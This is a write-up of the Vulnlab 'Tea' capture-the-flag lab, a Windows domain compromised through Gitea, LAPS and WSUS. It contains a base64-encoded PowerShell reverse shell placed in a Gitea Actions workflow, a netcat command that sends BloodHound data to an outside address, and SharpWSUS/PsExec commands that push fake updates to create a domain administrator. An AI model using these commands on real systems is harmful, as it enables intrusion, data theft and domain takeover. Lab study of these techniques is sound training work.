7.3 KiB
Vulnlab - Tea
DC.tea.vl
PORT STATE SERVICE VERSION
80/tcp filtered http
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-02-22 11:44:27Z)
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.tea.vl
| Issuer: commonName=DC.tea.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-12-19T15:32:23
| Not valid after: 2024-06-19T15:32:23
| MD5: 192634541f77066c4d54456555ec94a4
|_SHA-1: 4db67e0cd398334e78518b2f4b063b4d342f1508
|_ssl-date: 2024-02-22T11:45:15+00:00; +45s from scanner time.
| rdp-ntlm-info:
| Target_Name: TEA
| NetBIOS_Domain_Name: TEA
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: tea.vl
| DNS_Computer_Name: DC.tea.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-02-22T11:44:35+00:00
9389/tcp open mc-nmf .NET Message Framing
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
SRV.tea.vl
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3000/tcp open ppp?
| fingerprint-strings:
| GenericLines, Help, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Cache-Control: max-age=0, private, must-revalidate,
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-02-22T12:35:01+00:00; +44s from scanner time.
| rdp-ntlm-info:
| Target_Name: TEA
| NetBIOS_Domain_Name: TEA
| NetBIOS_Computer_Name: SRV
| DNS_Domain_Name: tea.vl
| DNS_Computer_Name: SRV.tea.vl
PORT 3000 (Gitea)
Registering an account on gitea and checking the users, we only have `gitea@tea.vl`Abusing gitea runner
This version is running 1.21.2
which doesn't have any exploits, from user settings under Actions
we have one active runner
To abuse this runner, we need to first create a repository and enable Actions
Now creating .gitea/workflows/demo.yaml
file in the repository that we have created
Using base64 encoded reverse shell
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADAALgAxADMANgAiACwAMgAyADIAMgApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=
name: Gitea Actions Demo
run-name: ${{ gitea.actor }} is testing out Gitea Actions 🚀
on: [push]
jobs:
Explore-Gitea-Actions:
runs-on: windows-latest
steps:
- run: powershell -e encode_command
Transferring and executing SharpHound
Sharphound.exe -c all
To transfer the output, we can utilize netcat
cmd.exe /c '.\nc.exe -w 3 10.8.0.136 2222 < 20240222075332_BloodHound.zip'
nc -l -p 2222 > 20240222075332_BloodHound.zip
From bloodhound, it doesn't show much what ACLs does thomas have but we do see that it belongs to Server Administration
group
From C:\
drive, we can see WSUS, so we might be able to abuse it
We also have _install
folder having LAPS (Locally Administratrive Password Solution) installer,
We can try reading LAPS on SRV as this user belongs to server administrator group, from the documentation we can use Get-LapsADPassword
to retrieve clear text password of local administrator on SRV
Get-LapsADPassword -Identity SRV -AsPlainText
We can verify this from netexec
We know WSUS is installed which is a solution for deploying windows updates for systems in a domain where the hosts don’t have to reach out to internet to get the updates instead they can get updates internally
Abusing WSUS To Become Domain Admin
Since SRV is WSUS server from where updates are deployed and we are local admin, we can deploy malicious updates to DC like adding our own user to be part of domain admin, first we'll have to create a domain user
cmd.exe /c 'SharpWSUS.exe create /payload:"C:\Users\Administrator\Documents\PsExec64.exe" /args:"-accepteula -s -d cmd.exe /c \" net user arz P@assword123 /add \"" /title:"Up
dating"'
Now approving the update
Verifying if the user is created
Now adding this to local administrators group on DC
cmd.exe /c 'SharpWSUS.exe create /payload:"C:\Users\Administrator\Documents\PsExec64.exe" /args:"-accepteula -s -d cmd.exe /c \"net localgroup administrators arz /add \"" /title:"Updating"'
Being a local admin on DC, we can just login through winrm